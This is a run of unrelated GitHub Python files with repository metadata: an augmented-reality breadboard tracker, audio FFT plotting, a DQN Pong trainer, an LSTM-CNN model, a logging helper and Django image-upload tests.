    coordinate_tem[2][1] = y24
    # Extrapolate the 1/4–3/4 scan-line hits outwards to the board corners.
    coordinate[0][0] = 1.5*coordinate_tem[0][0] - 0.5*coordinate_tem[1][0]
    coordinate[0][1] = 1.5*coordinate_tem[0][1] - 0.5*coordinate_tem[1][1]
    coordinate[1][0] = 1.5*coordinate_tem[1][0] - 0.5*coordinate_tem[0][0]
    coordinate[1][1] = 1.5*coordinate_tem[1][1] - 0.5*coordinate_tem[0][1]
    coordinate[3][0] = 1.5*coordinate_tem[3][0] - 0.5*coordinate_tem[2][0]
    coordinate[3][1] = 1.5*coordinate_tem[3][1] - 0.5*coordinate_tem[2][1]
    coordinate[2][0] = 1.5*coordinate_tem[2][0] - 0.5*coordinate_tem[3][0]
    coordinate[2][1] = 1.5*coordinate_tem[2][1] - 0.5*coordinate_tem[3][1]
    return coordinate
def calibrate(image, res):
    """Auto-detect the breadboard's four corners and start a KCF multi-tracker.

    `res` selects the working resolution (1/2/3) and the matching smoothing
    and Hough parameters. Returns (tracker, boxes) where boxes are the four
    corner ROIs handed to the tracker.
    """
    print("auto-calibration")
    img = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    img = cv2.Canny(img, 100, 100)
    G7 = kernel(7)
    G9 = kernel(9)
    # Blur the edge map (repeatedly) and re-binarise; pass counts, threshold
    # and image dimensions (par2 x par3) depend on the resolution. par1 is
    # the minimum number of collinear Hough lines required below.
    if res == 1:
        img= sp.convolve2d(img, G7, mode='same', boundary='symm')
        img= sp.convolve2d(img, G7, mode='same', boundary='symm')
        img = np.where(img > 40, 255., 0.)
        (par1, par2, par3) = (4, 400, 300)
    elif res == 2:
        img= sp.convolve2d(img, G7, mode='same', boundary='symm')
        img= sp.convolve2d(img, G7, mode='same', boundary='symm')
        img= sp.convolve2d(img, G7, mode='same', boundary='symm')
        img = np.where(img > 30, 255., 0.)
        (par1, par2, par3) = (8, 640, 480)
    elif res == 3:
        img= sp.convolve2d(img, G9, mode='same', boundary='symm')
        img= sp.convolve2d(img, G9, mode='same', boundary='symm')
        img= sp.convolve2d(img, G9, mode='same', boundary='symm')
        img= sp.convolve2d(img, G9, mode='same', boundary='symm')
        img = np.where(img > 20, 255., 0.)
        (par1, par2, par3) = (9, 960, 720)
    tem1 = img  # keep the binarised board mask for findcorners()
    # Harris corner response, dilated and thresholded, then edge-detected.
    img = np.float32(img)
    dst = cv2.cornerHarris(img,2,3,0.01)
    dst = cv2.dilate(dst,None)
    img = np.where(dst>0.001*dst.max(), 255, 0)
    img = img.astype('uint8')
    img = cv2.Canny(img, 230, 250)
    # Lower the Hough threshold until at least par1 lines share one angle.
    threshold = 250
    count = [0]
    while count[0]<par1:
        lines = cv2.HoughLines(img,1,np.pi/180,threshold)
        if not lines is None:
            theta = lines[:,0,1]
            mode, count = stats.mode(theta)
        threshold-=10
    # Keep only lines at the dominant angle, sorted by distance from origin.
    theta = mode[0]
    lines = lines[lines[:,0,1]==theta]
    lines = lines[lines[:,0,0].argsort()]
    #draw long edges
    #drawlines(img, lines[0,0,0], lines[0,0,1])
    #drawlines(img, lines[len(lines)-1,0,0], lines[len(lines)-1,0,1])
    #find corners
    loc = findcorners(tem1, lines[0,0,0], lines[len(lines)-1,0,0], theta, par2)
    # Build a square ROI around each corner (side 2*par4, clamped to the
    # image bounds and to half the board height, capped at 50 px).
    par4 = min(loc[0][0],loc[0][1],(loc[1][1]-loc[0][1])/2,50)
    bbox1 = (loc[0][0]-par4, loc[0][1]-par4, 2*par4, 2*par4)
    par4 = min(loc[1][0],par3-loc[1][1],(loc[1][1]-loc[0][1])/2,50)
    bbox2 = (loc[1][0]-par4, loc[1][1]-par4, 2*par4, 2*par4)
    par4 = min(par2-loc[2][0],par3-loc[2][1],(loc[2][1]-loc[3][1])/2,50)
    bbox3 = (loc[2][0]-par4, loc[2][1]-par4, 2*par4, 2*par4)
    par4 = min(par2-loc[3][0],loc[3][1],(loc[2][1]-loc[3][1])/2,50)
    bbox4 = (loc[3][0]-par4, loc[3][1]-par4, 2*par4, 2*par4)
    tracker = cv2.MultiTracker_create()
    tracker.add(cv2.TrackerKCF_create(), image, bbox1)
    tracker.add(cv2.TrackerKCF_create(), image, bbox2)
    tracker.add(cv2.TrackerKCF_create(), image, bbox3)
    tracker.add(cv2.TrackerKCF_create(), image, bbox4)
    boxes = [bbox1, bbox2, bbox3, bbox4]
    return tracker, boxes
def track(image, tracker):
    """Advance the multi-tracker one frame, annotate FPS, return the boxes."""
    start = cv2.getTickCount()
    ok, boxes = tracker.update(image)
    fps = cv2.getTickFrequency() / (cv2.getTickCount() - start)
    cv2.putText(image, "FPS : " + str(int(fps)), (10, 60),
                cv2.FONT_HERSHEY_SIMPLEX, 0.75, (50, 170, 50), 2)
    cv2.putText(image, "Tracking, KCF tracker", (10, 30),
                cv2.FONT_HERSHEY_SIMPLEX, 0.75, (50, 170, 50), 2)
    return boxes
def manual_calibrate(image):
    """Let the user drag four corner ROIs by hand and start a KCF tracker."""
    cv2.putText(image, "Manually calibrating", (10, 30),
                cv2.FONT_HERSHEY_SIMPLEX, 0.75, (50, 170, 50), 2)
    boxes = [cv2.selectROI('breadboard', image) for _ in range(4)]
    tracker = cv2.MultiTracker_create()
    for box in boxes:
        tracker.add(cv2.TrackerKCF_create(), image, box)
    return tracker, boxes
def display(image, boxes):
    """Draw the tracked corner centres and show the frame resized to 640x480."""
    # NOTE(review): a legitimate box with x == 0 is also falsy here; this test
    # is meant to skip the [[[]]] placeholder used before calibration.
    if boxes[0][0]:
        for x, y, w, h in boxes:
            centre = (int(x + 0.5 * w), int(y + 0.5 * h))
            cv2.circle(image, centre, 5, (0, 0, 255), -1)
    image = cv2.resize(image, (640, 480), interpolation=cv2.INTER_CUBIC)
    cv2.imshow("breadboard", image)
def AR(frame, boxes, loc):
    """Overlay the 3D resistor model on the frame using the tracked corners.

    boxes: four tracked corner ROIs; loc: (x, y, zoom) from the trackbars,
    used both as the camera principal point and as the model placement.
    """
    coordinate = np.zeros([4,2])
    if boxes[0][0]:
        # Use the centre of each tracked box as a board corner.
        for i in range(4):
            coordinate[i][0] = boxes[i][0]+0.5*boxes[i][2]
            coordinate[i][1] = boxes[i][1]+0.5*boxes[i][3]
        srcpoints = np.float32(coordinate).reshape(-1, 1, 2)
        # Reference plane: a 600x120 canvas mapped onto the board corners.
        canvaspoints = np.float32([[0,0],[0,119],[599,119],[599,0]]).reshape(-1, 1, 2)
        homography, mask = cv2.findHomography(canvaspoints, srcpoints, cv2.RANSAC, 5.0)
        #frame = cv2.polylines(frame, [np.int32(coordinate)], True, 255, 2, cv2.LINE_AA)
    else:
        homography = None
    if homography is not None:
        camera_parameters = np.array([[520, 0, loc[0]], [0, 520, loc[1]], [0, 0, 1]])
        projection = projection_matrix(camera_parameters, homography)
        # NOTE(review): the OBJ model is re-read from disk on every frame;
        # caching it at module level would avoid repeated file I/O.
        dir_name = os.getcwd()
        obj = OBJ(os.path.join(dir_name, 'models/resistor.obj'), swapyz=True)
        frame = render(frame, obj, projection, loc)
def render(img, obj, projection, loc, color=False):
    """
    Render a loaded obj model into the current video frame

    img: BGR frame to draw on; obj: a parsed OBJ instance; projection: the
    3x4 projection matrix from projection_matrix(); loc: (x, y, zoom) — the
    zoom scales the model and (x, y) displaces it on the reference plane.
    Returns the frame with each face filled as a convex polygon.
    """
    vertices = obj.vertices
    scale_matrix = np.eye(3) * loc[2]
    for face in obj.faces:
        face_vertices = face[0]
        # OBJ face indices are 1-based.
        points = np.array([vertices[vertex - 1] for vertex in face_vertices])
        points = np.dot(points, scale_matrix)
        # render model in the middle of the reference surface. To do so,
        # model points must be displaced
        points = np.array([[p[2]+loc[0],p[0]+loc[1],p[1]] for p in points])
        dst = cv2.perspectiveTransform(points.reshape(-1, 1, 3), projection)
        imgpts = np.int32(dst)
        if color is False:
            cv2.fillConvexPoly(img, imgpts, (137, 27, 211))
        else:
            # NOTE(review): face[-1] is the texcoord list here (the material
            # append in OBJ.__init__ is commented out), so hex_to_rgb would
            # fail — confirm before enabling this colour path.
            color = hex_to_rgb(face[-1])
            color = color[::-1]  # reverse
            cv2.fillConvexPoly(img, imgpts, color)
    return img
def projection_matrix(camera_parameters, homography):
    """
    From the camera calibration matrix and the estimated homography
    compute the 3D projection matrix
    """
    # Recover the rotation/translation columns from the sign-flipped
    # homography: [r1 r2 t] ~ K^-1 * (-H).
    homography = homography * (-1)
    rt = np.dot(np.linalg.inv(camera_parameters), homography)
    col_1, col_2, col_3 = rt[:, 0], rt[:, 1], rt[:, 2]
    # Normalise by the geometric mean of the two rotation-column norms.
    scale = math.sqrt(np.linalg.norm(col_1, 2) * np.linalg.norm(col_2, 2))
    rot_1 = col_1 / scale
    rot_2 = col_2 / scale
    translation = col_3 / scale
    # Orthonormalise rot_1/rot_2 via the symmetric construction, then take
    # their cross product for the third basis vector.
    c = rot_1 + rot_2
    p = np.cross(rot_1, rot_2)
    d = np.cross(c, p)
    rot_1 = np.dot(c / np.linalg.norm(c, 2) + d / np.linalg.norm(d, 2), 1 / math.sqrt(2))
    rot_2 = np.dot(c / np.linalg.norm(c, 2) - d / np.linalg.norm(d, 2), 1 / math.sqrt(2))
    rot_3 = np.cross(rot_1, rot_2)
    return np.dot(camera_parameters, np.stack((rot_1, rot_2, rot_3, translation)).T)
def hex_to_rgb(hex_color):
    """
    Helper function to convert hex strings to RGB

    Accepts an optional leading '#' and splits the remaining digits into
    three equal-width components.
    """
    digits = hex_color.lstrip('#')
    step = len(digits) // 3
    return tuple(int(digits[i:i + step], 16)
                 for i in range(0, len(digits), step))
if __name__ == '__main__':
video, locate_method, res = get_video()
(num, operation, boxes) = (0, 1, [[[]]])
time = cv2.getTickCount()
ok, frame1 = video.read()
#if True:
while True:
ok, frame = video.read()
#frame = cv2.flip(frame, -1)
#frame = frame1
if not ok:
print('No video')
break
X_pos = cv2.getTrackbarPos('X_position','breadboard')
Y_pos = cv2.getTrackbarPos('Y_position','breadboard')
Zoom = 0.1*cv2.getTrackbarPos('Zoom','breadboard')
location_parameters = (X_pos, Y_pos, Zoom)
#choose resolution from low, median, high
if res == 1:
frame=cv2.resize(frame,(400,300),interpolation=cv2.INTER_CUBIC)
elif res == 2:
frame=cv2.resize(frame,(640,480),interpolation=cv2.INTER_CUBIC)
elif res == 3:
frame=cv2.resize(frame,(960,720),interpolation=cv2.INTER_CUBIC)
#choose locating method from aotu, maunal, and track
if locate_method == 1:
#auto-calibrate
try:
tracker, boxes = calibrate(frame, res)
locate_method = 2
except:
print("calibrate fail, re-calibrating")
time = cv2.getTickCount()
elif locate_method == 2:
#track
boxes = track(frame, tracker)
elif locate_method == 3:
#manually calibrate
tracker, boxes = manual_calibrate(frame)
locate_method = 2
time = cv2.getTickCount()
if operation == 1:
AR(frame, boxes, location_parameters)
display(frame, boxes)
#auto calibrate for every 5 seconds
if (cv2.getTickCount()-time)//cv2.getTickFrequency() >= 5:
if locate_method == 2:
time = cv2.getTickCount()
locate_method = 1
#deal with keyboard
key = cv2.waitKey(1) & 0xFF
if key == 27:
#press esc to escape
print("esc break...")
break
elif key == ord(' '):
print("Pause")
key = cv2.waitKey(0) & 0xFF
if key == ord('s'):
print("save current frame")
num = num+1
filename = "frames_%s.jpg" % num
cv2.imwrite(filename, frame)
if key == ord('m'):
print("manual calibration")
locate_method = 3
if key == ord('c'):
locate_method = 1
elif key == ord('m'):
print("manual calibration")
locate_method = 3
elif key == ord('c'):
locate_method = 1
video.release()
cv2.destroyWindow("breadboard")
| Hao-Wang-Henry/Augmented-Reality-Circuit-Learning | final code with AR.py | final code with AR.py | py | 16,471 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "cv2.VideoCapture",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "cv2.namedWindow",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "cv2.createTrackbar",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "cv2.createTrackba... |
30589096561 | """mse_home.log module."""
import logging
LOGGER = logging.getLogger("mse")


def setup_logging(debug: bool = False):
    """Configure basic logging.

    Installs a bare-message root format and sets the 'mse' logger to DEBUG
    when `debug` is true, INFO otherwise.
    """
    logging.basicConfig(format="%(message)s")
    level = logging.DEBUG if debug else logging.INFO
    LOGGER.setLevel(level)
| Cosmian/mse-home-cli | mse_home/log.py | log.py | py | 263 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "logging.basicConfig",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "logging.INFO"... |
6733216231 | import seaborn as sbn
import numpy as np
import matplotlib.pylab as plt
import scipy as sci
from scipy.io import wavfile
sr, aud_array = wavfile.read(r'C:\Users\jackk\OneDrive - South East Technological University (Waterford Campus)\college backup\semester 7\Digital Signal Processing\mini project\python files\vivaldi_V1.wav')
time = len(aud_array)/sr
x = np.linspace(0,time,len(aud_array))
#print(np.shape(aud_array))
if 0:
plt.plot(x, aud_array,)
plt.xlabel("time (s)"); plt.ylabel("Amplitude")
plt.show()
if 0:
#for i in range(0,2):
aud_array[:,1] = abs(np.fft.fft(aud_array[:,1]))
plt.plot(aud_array[:,1])
plt.show()
#frequency domain
if 1:
sig0 = aud_array[:,0]
sig0 = abs(np.fft.fft(sig0/len(sig0)))
sig1 = aud_array[:,1]
sig1 = abs(np.fft.fft(sig1/len(sig1)))
freqax = sci.fftpack.fftfreq(len(sig1),1.0/sr) #look into this
plt.plot(freqax, 20*np.log10(sig0), label = 'channel 1')
# plt.plot(freqax, 20*np.log10(sig1), label = 'channel 2')
plt.xlabel("Frequency (Hz)"); plt.ylabel("Amplitude (dB)")
plt.legend(loc="upper left")
#plt.yscale("log")
plt.show()
#own attempt of freq domain
if 0:
sig0 = aud_array[:,0]
sig0 = abs(np.fft.fft(sig0/len(sig0)))
sig1 = aud_array[:,1]
sig1 = abs(np.fft.fft(sig1/len(sig1)))
freqax = np.linspace(-sr/2,sr/2,len(sig0))
plt.plot(freqax, sig0)
#plt.plot(freqax, sig1)
#plt.yscale("log")
plt.show()
print(freqax)
| jackkelly247/DSP | first steps parsing wav file.py | first steps parsing wav file.py | py | 1,539 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "scipy.io.wavfile.read",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "scipy.io.wavfile",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "numpy.linspace",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "matplotlib.pylab.... |
31061791335 |
from ..utils import Object
class RemoveAllFilesFromDownloads(Object):
"""
Removes all files from the file download list
Attributes:
ID (:obj:`str`): ``RemoveAllFilesFromDownloads``
Args:
only_active (:obj:`bool`):
Pass true to remove only active downloads, including paused
only_completed (:obj:`bool`):
Pass true to remove only completed downloads
delete_from_cache (:obj:`bool`):
Pass true to delete the file from the TDLib file cache
Returns:
Ok
Raises:
:class:`telegram.Error`
"""
ID = "removeAllFilesFromDownloads"
def __init__(self, only_active, only_completed, delete_from_cache, extra=None, **kwargs):
self.extra = extra
self.only_active = only_active # bool
self.only_completed = only_completed # bool
self.delete_from_cache = delete_from_cache # bool
@staticmethod
def read(q: dict, *args) -> "RemoveAllFilesFromDownloads":
only_active = q.get('only_active')
only_completed = q.get('only_completed')
delete_from_cache = q.get('delete_from_cache')
return RemoveAllFilesFromDownloads(only_active, only_completed, delete_from_cache)
| iTeam-co/pytglib | pytglib/api/functions/remove_all_files_from_downloads.py | remove_all_files_from_downloads.py | py | 1,245 | python | en | code | 20 | github-code | 36 | [
{
"api_name": "utils.Object",
"line_number": 6,
"usage_type": "name"
}
] |
15958493126 | import os
from itertools import product
import re
from numpy import append, array, bincount, diff, ma, sort #cumsum, nditer, roll, setdiff1d, where
from numpy import product as np_prod
seating_re = re.compile('[L\.]')
workPath = os.path.expanduser("~/Documents/Code/Advent_of_code/2020")
os.chdir(workPath)
#with open("day-11_data.txt", "r") as in_file:
with open("test_data.txt", "r") as in_file:
data = array([list(row.strip()) for row in in_file])
empty_seats = ma.masked_where(data == 'L', data).mask
floor = ma.masked_where(data == '.', data).mask
occupied_seats = ma.masked_where(data == '#', data).mask
occupied = array([[False, False, False], [False, True, False], [False, False, False]])
# Part 1:
sorted_adapters = sort(data)
sorted_adapters = append(append(array([0]), sorted_adapters), sorted_adapters[-1]+3)
jolts = diff(sorted_adapters)
distribution = {k:v for k, v in zip(range(max(set(jolts))+4), bincount(jolts))}
print(f"The product of the counts of 1- and 3-jolt differences is {distribution[1]*distribution[3]}")
# Part 2:
def possible_permutations(n, m):
perms = (i for i in product(list(range(m + 1)), repeat=n) if sum(i) == n)
return set(tuple(n for n in sublist if n != 0) for sublist in perms)
max_step = 3
reps = re.findall('1{2,}', ''.join([str(i) for i in jolts]))
rep_lens = [len(i) for i in reps]
perm_dict = {s:len(possible_permutations(s, max_step)) for s in range(2, max(rep_lens) + 1)}
counts = np_prod([perm_dict[possibilities] for possibilities in rep_lens])
print(f"There are {counts} possible permutations of the adapters")
| jdmuss/advent_of_code | 2020/day_11.py | day_11.py | py | 1,586 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "re.compile",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "os.path.expanduser",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "os.chdir",
"line_number":... |
3113291140 | """common logging for easy integration with application insights"""
import logging
import sys
from typing import Any, Dict, Optional
from opencensus.ext.azure.log_exporter import AzureLogHandler
class FunctionName:
ED = "event_driven"
PACKAGES = {
FunctionName.ED: "event_driven",
}
class OptionalCustomDimensionsFilter(logging.Formatter):
"""filter that outputs `custom_dimensions` if present"""
def __init__(self, message_fmt: str, function_name: str) -> None:
logging.Formatter.__init__(self, message_fmt, None)
self.function_name = function_name
def format(self, record: logging.LogRecord) -> str:
if "custom_dimensions" not in record.__dict__:
record.__dict__["custom_dimensions"] = ""
else:
# add the function name to custom_dimensions so it's queryable
record.__dict__["custom_dimensions"]["function"] = self.function_name
return super().format(record)
class CustomDimensionsFilter(logging.Filter):
"""filter for azure-targeted messages containing `custom_dimensions`"""
def filter(self, record: logging.LogRecord) -> bool:
return bool(record.__dict__["custom_dimensions"])
def init_logging(function_name: str, cnx_str: Optional[str] = None) -> logging.Logger:
"""initialize log handlers"""
package = PACKAGES[function_name]
logger = logging.getLogger(package)
logger.setLevel(logging.INFO)
# console handler
console_handler = logging.StreamHandler(sys.stdout)
console_handler.setLevel(logging.DEBUG)
console_format = "[%(levelname)s] %(asctime)s - %(message)s %(custom_dimensions)s"
formatter = OptionalCustomDimensionsFilter(console_format, function_name)
console_handler.setFormatter(formatter)
logger.addHandler(console_handler)
# azure log handler
if cnx_str is not None:
azure_handler = AzureLogHandler(connection_string=cnx_str)
azure_handler.addFilter(CustomDimensionsFilter())
logger.addHandler(azure_handler)
else:
logger.info(f"azure log handler not attached: {package} (missing key)")
return logger
def get_custom_dimensions(
dimensions: Dict[str, Any], function_name: str
) -> Dict[str, Any]:
"""merge the base dimensions with the given dimensions"""
base_dimensions = {"function": function_name}
base_dimensions.update(dimensions)
return {"custom_dimensions": base_dimensions}
| dgonzo27/event-driven-architecture | functions/utils/logging.py | logging.py | py | 2,446 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.Formatter",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "logging.Formatter.__init__",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "logging.Formatter",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name... |
28065082848 | from argparse import ArgumentParser
from collections import namedtuple, deque
from functools import partial
from random import sample
from time import time
import numpy as np
import torch
from gym import make
from numpy.random import random
from torch import tensor, save, no_grad
from torch.nn import MSELoss
from torch.optim import Adam
from torch.utils.tensorboard import SummaryWriter
from Chapter6.lib import wrappers, dqn_model
DEFAULT_ENV_NAME = "PongNoFrameskip-v4"
MEAN_REWARD_BOUND = 19.5
GAMMA = 0.99
BATCH_SIZE = 32
REPLAY_SIZE = 10000
REPLAY_START_SIZE = 10000
LEARNING_RATE = 1e-4
SYNC_TARGET_FRAMES = 1000
EPSILON_DECAY_LAST_FRAME = 150000
EPSILON_START = 1.0
EPSILON_FINAL = 0.01
Experience = namedtuple("Experience", field_names="state action reward done new_state")
class ExperienceBuffer:
def __init__(self, capacity):
self.buffer = deque(maxlen=capacity)
def __len__(self):
return len(self.buffer)
def append(self, experience):
self.buffer.append(experience)
def sample(self, batch_size):
entries = zip(*sample(self.buffer, k=batch_size))
array_data_types = (None, np.int64, np.float32, np.bool, None)
return tuple(map(np.array, entries, array_data_types))
class Agent:
def __init__(self, env, exp_buffer):
self.env = env
self.exp_buffer = exp_buffer
self.state = None
self._reset()
def _reset(self):
self.state = self.env.reset()
self.total_reward = 0.0
@no_grad
def play_step(self, net, epsilon=0.0, device="cuda"):
done_reward = None
if random() < epsilon:
action = self.env.action_space.sample()
else:
state_v = tensor(self.state).unsqueeze(0).to(device)
q_vals_v = net(state_v)
_, act_v = q_vals_v.max(dim=1)
action = int(act_v.item())
new_state, reward, is_done, _ = self.env.step(action)
self.total_reward += reward
self.total_reward += reward
exp = Experience(self.state, action, reward, is_done, new_state)
self.exp_buffer.append(exp)
self.state = new_state
if is_done:
done_reward = self.total_reward
self._reset()
return done_reward
def calc_loss(self, batch, net, tgt_net, device="cuda"):
cuda_tensor = partial(tensor, device=device)
states, actions, rewards, dones, next_states = map(cuda_tensor, batch)
state_action_values = net(states).gather(1, actions.unsqueeze(-1)).squeeze(-1)
with no_grad():
next_state_values = tgt_net(next_states).max(1)[0]
next_state_values[dones] = 0.0
next_state_values = next_state_values.detach()
expected_state_action_values = next_state_values * GAMMA + rewards
return MSELoss()(state_action_values, expected_state_action_values)
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument("--cuda", default=True, action="store_true", help="Enable cuda")
parser.add_argument("--env", default=DEFAULT_ENV_NAME, help="Name of the environment")
parser.add_argument("--reward", type=float, default=MEAN_REWARD_BOUND,
help=f"Mean reward boundary for stop of training, default={MEAN_REWARD_BOUND:.2f}")
args = parser.parse_args()
device = torch.device("cuda" if args.cuda else "cpu")
env = wrappers.wrap_deepmind(make(args.env), episode_life=1, clip_rewards=1, frame_stack=1, scale=1)
net = dqn_model.DQN(env.observation_space.shape, env.action_space.n).to(device)
tgt_net = dqn_model.DQN(env.observation_space.shape, env.action_space.n).to(device)
with SummaryWriter(comment="-" + args.env) as writer:
print(net)
buffer = ExperienceBuffer(REPLAY_SIZE)
agent = Agent(env, buffer)
optimizer = Adam(net.parameters(), lr=LEARNING_RATE)
total_rewards = []
frame_idx = 0
ts_frame = 0
ts = time()
best_mean_reward = None
while True:
frame_idx += 1
epsilon = max(EPSILON_FINAL, EPSILON_START - frame_idx / EPSILON_DECAY_LAST_FRAME)
reward = agent.play_step(net, epsilon, device)
if reward is not None:
total_rewards.append(reward)
speed = (frame_idx - ts_frame) / (time() - ts)
ts_frame = frame_idx
ts = time()
mean_reward = np.mean(total_rewards[-100:])
print(f"{frame_idx} done {len(total_rewards)} games, mean reward {mean_reward:.3f},"
f" eps {epsilon:.2f}, speed {speed:.2f}")
writer.add_scalar("epsilon", epsilon, frame_idx)
writer.add_scalar("speed", speed, frame_idx)
writer.add_scalar("reward_100", mean_reward, frame_idx)
writer.add_scalar("reward", reward, frame_idx)
if best_mean_reward is None or best_mean_reward < mean_reward:
save(net.state_dict(), args.env + "-best.dat")
if best_mean_reward is not None:
print(f"Best mean reward updated {best_mean_reward:.3f} -> {mean_reward:.3f}, model saved")
best_mean_reward = mean_reward
if mean_reward > args.reward:
print(f"solved in {frame_idx} frames!")
break
if len(buffer) < REPLAY_START_SIZE:
continue
if frame_idx % SYNC_TARGET_FRAMES == 0:
tgt_net.load_state_dict(net.state_dict())
optimizer.zero_grad()
batch = buffer.sample(BATCH_SIZE)
loss_t = agent.calc_loss(batch, net, tgt_net, device)
loss_t.backward()
optimizer.step()
| Daggerfall-is-the-best-TES-game/reinforcement-learning | Chapter6/02_dqn_pong.py | 02_dqn_pong.py | py | 5,814 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "collections.namedtuple",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "collections.deque",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "random.sample",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "numpy.int64",
... |
28042659077 | import requests
from contextlib import closing
import csv
import codecs
import matplotlib.pyplot as plt
url = 'http://www.mambiente.munimadrid.es/opendata/horario.txt'
with closing(requests.get(url, stream='true')) as r:
reader = csv.reader(codecs.iterdecode(r.iter_lines(), 'utf-8'), delimiter=',')
for row in reader:
if (row[0] + row[1] + row[2] == '28079004' and row[3] == '12'):
plt.title('Oxido de nitrogeno: ' + row[8] + '/' + row[7] + row[6])
hora = 0
desp = 9
vs = []
horas = []
while hora <= 23:
if row[desp + 2 * hora + 1] == 'V':
vs.append(row[desp+2*hora])
horas.append(hora)
hora += 1
plt.plot(horas, vs)
plt.show() | Berckbel/bigDataPython | Ficheros/fIcherosEnWEB1.py | fIcherosEnWEB1.py | py | 835 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "contextlib.closing",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "csv.reader",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "codecs.iterdecode",
"lin... |
7135785492 | # -*- coding: utf-8 -*-
# ***************************************************
# * File : LSTM_CNN.py
# * Author : Zhefeng Wang
# * Email : wangzhefengr@163.com
# * Date : 2023-05-28
# * Version : 0.1.052816
# * Description : description
# * Link : link
# * Requirement : 相关模块版本需求(例如: numpy >= 2.1.0)
# ***************************************************
# python libraries
import os
import sys
ROOT = os.getcwd()
if str(ROOT) not in sys.path:
sys.path.append(str(ROOT))
import torch
import torch.nn as nn
# global variable
LOGGING_LABEL = __file__.split('/')[-1][:-3]
class Model(nn.Module):
def __init__(self,
feature_size,
timestep,
hidden_size,
num_layers,
out_channels,
output_size) -> None:
super(Model, self).__init__()
self.hidden_size = hidden_size
self.num_layers = num_layers
# LSTM
self.lstm = nn.LSTM(
input_size = feature_size,
hidden_size = hidden_size,
num_layers = num_layers,
batch_first = True,
)
# 卷积层
self.conv1d = nn.Conv1d(
in_channels = timestep,
out_channels = out_channels,
kernel_size = 3,
)
# 输出层
self.linear1 = nn.Linear(in_features = 50 * 254, out_features = 256)
self.linear2 = nn.Linear(in_features = 256, out_features = output_size)
# 激活函数
self.relu = nn.ReLU()
def forward(self, x, hidden = None):
batch_size = x.shape[0]
# 初始化隐藏层状态
if hidden is None:
h_0 = x.data.new(self.num_layers, batch_size, self.hidden_size).fill_(0).float()
c_0 = x.data.new(self.num_layers, batch_size, self.hidden_size).fill_(0).float()
else:
h_0, c_0 = hidden
# LSTM
output, (h_0, c_0) = self.lstm(x, (h_0, c_0)) # (batch_size, timestep, hidden_size)
# 卷积
output = self.conv1d(output)
# 展开
output = output.flatten(output)
# 全连接层
output = self.linear1(output)
output = self.relu(output)
output = self.linear2(output)
return output
# 测试代码 main 函数
def main():
pass
if __name__ == "__main__":
main()
| wangzhefeng/tsproj | models/csdn/LSTM_CNN.py | LSTM_CNN.py | py | 2,422 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.getcwd",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "sys.path.append",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number":... |
40194408515 | from products.models import get_product_model
from django.contrib.auth import get_user_model
from django.test import TestCase
from django.urls import reverse
from django.core.files.uploadedfile import SimpleUploadedFile
import requests
# Create your tests here.
# Images app test
class ImageManagerTest(TestCase):
@classmethod
def setUpTestData(self):
self.product = get_product_model().objects.create(
name="Hoe",
producer="Universe",
price=25,
description="Test One",
count=1000,
)
casual_user = get_user_model().objects.create(
username="testuser",
)
casual_user.set_password("testpass123")
casual_user.save()
staff_user = get_user_model().objects.create(
username="staffuser",
is_staff=True,
)
staff_user.set_password("testpass123")
staff_user.save()
self.url = reverse("images_manager", kwargs={"pk": self.product.pk})
# images to test upload
self.images = list()
for i in range(5):
res = requests.get("https://picsum.photos/200/300", stream=True)
image = SimpleUploadedFile(
f"image{i}.jpg", res.content, content_type="image/jpeg"
)
self.images.append(image)
self.image = self.images[0]
# Initial images in test db
for i in range(5):
res = requests.get("https://picsum.photos/200/300", stream=True)
self.product.images.create(
image=SimpleUploadedFile(
f"image{i}.jpg", res.content, content_type="image/jpeg"
),
place=i,
)
def test_use_manager_as_unauthorized_user(self):
self.client.logout()
response = self.client.get(
self.url,
follow=True,
)
self.assertContains(response, "Sign In")
self.assertEquals(
response.wsgi_request.path,
reverse("account_login"),
)
self.assertEquals(
*response.redirect_chain,
(reverse("account_login") + "?next=" + self.url, 302),
)
assert "next" in response.wsgi_request.GET
self.assertEqual(response.wsgi_request.GET.get("next"), self.url)
self.assertEqual(response.wsgi_request.resolver_match.url_name, "account_login")
def test_manage_images_as_casual_user(self):
assert self.client.login(username="testuser", password="testpass123")
response = self.client.get(
self.url,
follow=True,
)
self.assertEquals(response.status_code, 403)
self.assertEquals(response.reason_phrase, "Forbidden")
def test_upload_image(self):
assert self.client.login(username="staffuser", password="testpass123")
images_count = self.product.images.count()
response = self.client.post(
self.url,
data={
"upload_images": "upload_images",
"image": self.image,
"product_pk": self.product.pk,
},
follow=True,
)
self.assertEqual(response.status_code, 200)
self.assertEqual(self.product.images.count(), images_count + 1)
